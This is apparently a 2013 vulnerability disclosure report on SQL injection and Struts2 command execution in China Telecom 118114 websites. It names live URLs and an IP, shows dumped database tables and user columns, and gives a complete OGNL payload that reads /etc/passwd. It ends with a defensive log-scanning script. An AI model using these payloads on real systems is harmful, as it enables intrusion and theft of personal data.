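2013-07-23: Details reported to the vendor, awaiting vendor handling
2013-07-27: Vendor confirmed; details disclosed to the vendor only
2013-08-06: Details disclosed to core white hats and experts in related fields
2013-08-16: Details disclosed to regular white hats
2013-08-26: Details disclosed to intern white hats
2013-09-06: Details disclosed to the public
China Telecom 118114: SQL injection and command execution on a site
1# SQL injection: main recruitment site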
"http://zj.118114.cn:8080/default/joblist?district=330000&keyword=1"
Data
Tables and entry counts
Database: zp
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| t_user        | 17841   |
| t_job         | 7131    |
| t_jobcate     | 2779    |
| t_company     | 2280    |
| t_admin       | 12      |
| t_apply       | 5       |
| t_admin_group | 3       |
+---------------+---------+
admin columns
Database: zp
Table: t_admin
[12 columns]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| gender      | tinyint(4)  |
| groupid     | int(11)     |
| id          | int(11)     |
| isadmin     | tinyint(4)  |
| isdelete    | tinyint(4)  |
| name        | varchar(30) |
| password    | varchar(32) |
| perms       | text        |
| update_date | int(11)     |
| update_id   | int(11)     |
| username    | varchar(30) |
| valid       | tinyint(4)  |
+-------------+-------------+
user columns
Database: zp
Table: t_user
[30 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| age               | int(11)      |
| contact_alternate | varchar(255) |
| dest_city_id      | int(11)      |
| dest_district     | varchar(10)  |
| dest_district_id  | int(11)      |
| dest_province_id  | int(11)      |
| education         | varchar(10)  |
| email             | varchar(50)  |
| id                | int(11)      |
| id_card           | varchar(50)  |
| include_comm      | smallint(6)  |
| include_food      | smallint(6)  |
| include_lodging   | smallint(6)  |
| isdelete          | tinyint(4)   |
| job_cate          | int(11)      |
| job_kind          | varchar(100) |
| login_times       | int(11)      |
| memo              | text         |
| mobile            | varchar(50)  |
| name              | varchar(50)  |
| org_city_id       | int(11)      |
| org_district      | varchar(10)  |
| org_district_id   | int(11)      |
| org_province_id   | int(11)      |
| password          | varchar(50)  |
| salary_high       | int(11)      |
| salary_low        | int(11)      |
| sex               | smallint(6)  |
| status            | smallint(6)  |
| working_years     | varchar(50)  |
+-------------------+--------------+
17841 users
2# Command execution EXP
?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
Main site
http://tools.118114.cn/cx/client/downloadway.do
Sub-site 1: Jiangsu
http://202.102.41.95/JSVideoInTraffic/portalPage/news!ToDETAILS.action
Debug output is available
http://202.102.41.95/JSVideoInTraffic/portalPage/news!ToDETAILS.action?formInfo.fID=3'
Sub-site 2: Fujian
http://piao.fj.118114.cn/piao/dy/cinema!desc.action
Filter & upgrade
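One way to check access logs for requests of the kind shown under 2# while the upgrade is rolled out, as an added example that is not part of the original report. It generalizes from the `redirect:` prefix in the report to the `action:` and `redirectAction:` prefixes as well (an assumption, not stated in the report); the log lines, paths and addresses are constructed.

```python
import re
from urllib.parse import unquote

# The report shows the `redirect:` prefix; `action:` and `redirectAction:` are
# added here as a generalization (assumption, not taken from the report).
PREFIXES = ("redirect:", "action:", "redirectAction:")
OGNL_OPEN = re.compile(r"[$%]\{")  # start of ${...} or %{...}
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def fully_unquote(text, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are still seen."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def is_suspicious(target):
    """True if a query parameter starts with a special prefix followed by OGNL."""
    if "?" not in target:
        return False
    for raw in target.split("?", 1)[1].split("&"):
        param = fully_unquote(raw)
        for prefix in PREFIXES:
            if param.startswith(prefix) and OGNL_OPEN.search(param[len(prefix):]):
                return True
    return False

def scan(lines):
    """Return (line_number, request_target) for each flagged access-log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match and is_suspicious(match.group(1)):
            hits.append((number, match.group(1)))
    return hits

# Constructed sample lines (combined log format, documentation addresses).
SAMPLE_LOG = [
    '198.51.100.7 - - [23/Jul/2013:10:01:02 +0800] "GET /app/news.action?id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Jul/2013:10:01:05 +0800] "GET /app/news.action?redirect:%24%7B%23a%3d1%7D HTTP/1.1" 200 13',
    '203.0.113.9 - - [23/Jul/2013:10:02:11 +0800] "GET /app/news.action?redirect%3A%2524%257B1%257D HTTP/1.1" 302 0',
    '203.0.113.9 - - [23/Jul/2013:10:02:40 +0800] "GET /app/joblist?district=330000&keyword=1 HTTP/1.1" 200 900',
    '192.0.2.44 - - [23/Jul/2013:10:03:00 +0800] "GET /app/login.action?redirect:/index.jsp HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for number, target in scan(SAMPLE_LOG):
        print(f"line {number}: {target}")
```

Line 5 of the sample uses the prefix without an expression and is deliberately not flagged; a front-end filter that rejects the prefixes outright would be stricter than this log check.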
Severity: High
Vulnerability Rank: 12
Confirmed at: 2013-07-27 18:47
None yet